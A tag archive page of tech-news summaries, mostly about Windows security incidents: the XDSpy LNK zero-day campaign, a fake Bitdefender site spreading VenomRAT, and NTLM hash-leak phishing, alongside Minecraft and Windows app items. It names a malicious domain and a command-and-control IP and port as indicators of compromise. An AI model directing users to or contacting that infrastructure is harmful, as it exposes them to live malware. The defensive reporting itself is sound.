Zip Archives

Winsage

June 18, 2025

XDSpy Threat Actors Leverages Windows LNKs Zero-Day Vulnerability to Attack Windows System Users

A cyber espionage campaign attributed to the XDSpy threat actor has been discovered, exploiting a zero-day vulnerability in Windows shortcut files identified as “ZDI-CAN-25373.” This vulnerability allows attackers to conceal executed commands within specially crafted shortcut files. XDSpy has primarily targeted government entities in Eastern Europe and Russia since its activities became known in 2020. Researchers from HarfangLab found malicious LNK files exploiting this vulnerability in mid-March, revealing issues with how Windows parses LNK files. The infection begins with a ZIP archive containing a malicious LNK file, which triggers a complex Windows shell command to execute malicious components while displaying a decoy document. This command extracts and executes a first-stage malware called “ETDownloader,” which establishes persistence and downloads a second-stage payload known as “XDigo.” The XDigo implant, written in Go, collects sensitive information and employs encryption for data exfiltration. This campaign represents an evolution in XDSpy's tactics, combining zero-day exploitation with advanced multi-stage payloads.

Winsage

June 18, 2025

XDSpy Threat Actors Exploit Windows LNK Zero-Day Vulnerability to Target Windows System Users

The XDSpy threat actor is exploiting a Windows LNK zero-day vulnerability (ZDI-CAN-25373) to target governmental entities in Eastern Europe and Russia since March 2025. This campaign involves a multi-stage infection chain deploying the XDigo implant, developed in Go. Attackers use spearphishing emails with ZIP archives containing crafted LNK files that exploit the vulnerability. Upon execution, these files sideload a malicious C# .NET DLL named ETDownloader, which establishes persistence and retrieves the XDigo payload from specific domains. XDigo is a data collection implant capable of file scanning, clipboard capture, and screenshot acquisition, communicating with command-and-control servers. The campaign targets Belarusian governmental entities and employs advanced tactics, including anti-analysis checks and encryption for data exfiltration. Indicators of compromise include specific SHA-256 hashes for ZIP archives, LNK files, the ETDownloader, and XDigo malware, along with associated distribution and command-and-control domains.

Winsage

June 6, 2025

Why I Use simplewall Instead of Windows Firewall (And You Should Too)

Simplewall is a rule-based firewall controller for Windows that enhances the Windows Filtering Platform (WFP) without replacing it. It allows users to manage network access for applications and services with a user-friendly interface, supporting advanced features like filtering rules by IP, port, or protocol. Users can create tailored profiles for different scenarios and have comprehensive control over network interactions, including blocking telemetry data and automatic updates. Simplewall is lightweight, portable, and operates without background processes or telemetry, ensuring a straightforward user experience. Setting up simplewall involves downloading it, extracting the files, and enabling filters, allowing users to establish a functional firewall profile quickly. While it offers many advantages, such as being open-source and compatible with older Windows versions, it may be overwhelming for beginners and lacks detailed app profiling compared to premium firewalls.

AppWizard

May 30, 2025

Minecoins vs. Free Mods: Is Premium Minecraft Content Worth Paying For?

Minecraft allows players to create and explore a vast world using blocks. Players often seek new experiences after repetitive gameplay, leading to a choice between using Minecoins or free mods. Free mods offer infinite content at no cost but require effort to install and manage, particularly for those on consoles or mobile devices. Mods can introduce various features like dragons or minimaps but exist outside the official game framework. Minecoins are the official in-game currency that allows players to purchase vetted content such as worlds, texture packs, and skins, providing convenience and reliability. This option is appealing to casual gamers or those who prefer a hassle-free experience. Players can choose between Minecoins for a seamless experience or free mods for customization and experimentation. Many players use both, combining mods for extensive changes and Minecoins for quick enhancements. The choice depends on individual preferences and playstyles.

Tech Optimizer

May 28, 2025

Hackers Mimic Popular Antivirus Site to Deliver VenomRAT & Steal Finance Data

Cybercriminals are executing a sophisticated malware campaign through a counterfeit Bitdefender antivirus website, specifically the domain “bitdefender-download[.]co,” which mimics the legitimate site. This fraudulent site distributes three types of malware: VenomRAT, StormKitty, and SilentTrinity, aimed at stealing financial data and maintaining persistent access to victims’ computers. When users click the “Download For Windows” button, they inadvertently download a ZIP file containing these malicious programs. VenomRAT acts as a remote access tool, allowing attackers to steal files, cryptocurrency wallets, and browser data, including credit card information. StormKitty quickly harvests sensitive credentials, while SilentTrinity provides stealthy long-term access for further exploitation. The fake Bitdefender site is linked to other malicious domains impersonating banks, indicating a coordinated phishing operation. The attackers utilize the same command and control infrastructure, with the IP address 67.217.228.160:4449 identified as a connection point. Bitdefender is working to take down the fraudulent site, and Google Chrome has begun flagging the link as malicious. Security experts recommend verifying website authenticity and downloading software only from official sources.

Winsage

May 14, 2025

Windows 11’s May update brings a heap of new features

Microsoft's latest update for Windows 11, KB5058411, includes enhancements and security fixes. Key features include AI integration in Windows Search for natural language queries, direct access to Microsoft 365 content in File Explorer (subscription required), improved performance for file opening and ZIP unpacking, and aesthetic updates to the interface. The update also removes the blue background for desktop shortcuts based on user feedback and implements various bug fixes. The update will download and install automatically for Windows 11 24H2 users, with an option for manual installation through Windows Update.

AppWizard

May 3, 2025

How to spawn Herobrine in Minecraft (with mods)

Herobrine is a character in Minecraft that players can summon using external modifications, as the game does not support his appearance natively. The Lunar Eclipse Studios’ From The Fog Mod is a popular option for the Java version of Minecraft. To install the mod, players must ensure they are using version 1.20.5 (or 1.20.6) of the game, download the datapack, and follow a series of steps to activate it in-game. Once installed, Herobrine will appear within three in-game days. Players can also build traditional Herobrine shrines to expedite his appearance, requiring specific materials: 1. First shrine: - 2 Blocks of Gold - 2 Netherrack 2. Second shrine: - 9 Blocks of Gold - 1 Netherrack - 4 Redstone Torches Players can gather these materials by mining or crafting: - Blocks of Gold are crafted from 9 Gold Ingots, which are obtained from Nether Gold Ore. - Redstone Torches are made from 1 stick and 1 Redstone Dust. Players can also use commands to switch to Creative Mode for easier material acquisition.

Winsage

April 25, 2025

My favorite File Explorer replacement just got better

Files has released an update to version 3.9.7, enhancing its functionality and introducing new customization features. Key improvements include a revamped Release Notes dialog that opens automatically after updates, customizable file size units, automatic encoding detection for ZIP file extraction, and UTF-8 encoding as the default for creating ZIP archives. The app is recognized for introducing features ahead of Windows File Explorer, such as tabs and unique functionalities like diverse view modes, sorting options, and tagging capabilities.

Winsage

April 19, 2025

Windows vulnerability with NTLM hash abuse exploited for phishing

A vulnerability in Windows, identified as CVE-2025-24054, is being exploited in phishing campaigns targeting government and private organizations. Initially considered low-risk, it was addressed in Microsoft's March 2025 Patch Tuesday updates. Following the release of these patches, Check Point observed a rise in exploitation attempts, particularly linked to the Russian group APT28. Attackers sent phishing emails with Dropbox links containing .library-ms files, which, when accessed, connected to an external SMB server controlled by the attackers, allowing interception of NTLM hashes. A subsequent wave of attacks involved .library-ms files sent as direct attachments, requiring minimal user interaction to exploit the vulnerability. The malicious ZIP archive also contained files exploiting older NTLM vulnerabilities. Check Point identified the attackers' SMB servers with specific IP addresses. Despite being classified as medium-severity, the vulnerability's potential impact is significant, prompting organizations to apply the March 2025 updates and consider disabling NTLM authentication if not essential.

Winsage

April 17, 2025

Windows NTLM hash leak flaw exploited in phishing attacks on governments

A vulnerability in Windows, identified as CVE-2025-24054, is being actively exploited in phishing campaigns targeting government and private sectors. Initially addressed in Microsoft's March 2025 Patch Tuesday, it was not considered actively exploited at that time. Researchers from Check Point reported increased exploitation activities shortly after the patches were released, particularly between March 20 and 25, 2025. Some attacks were linked to the Russian state-sponsored group APT28, but definitive attribution is lacking. The vulnerability allows attackers to capture NTLM hashes through phishing emails containing manipulated .library-ms files that trigger the flaw when interacted with. Check Point noted that subsequent attacks involved .library-ms files sent directly, requiring minimal user interaction to exploit. The malicious files also included additional components that exploit older vulnerabilities related to NTLM hash leaks. The attacker-controlled SMB servers were traced to specific IP addresses. Although rated as medium severity, the potential for authentication bypass and privilege escalation makes it a significant concern, prompting recommendations for organizations to install updates and disable NTLM authentication if not necessary.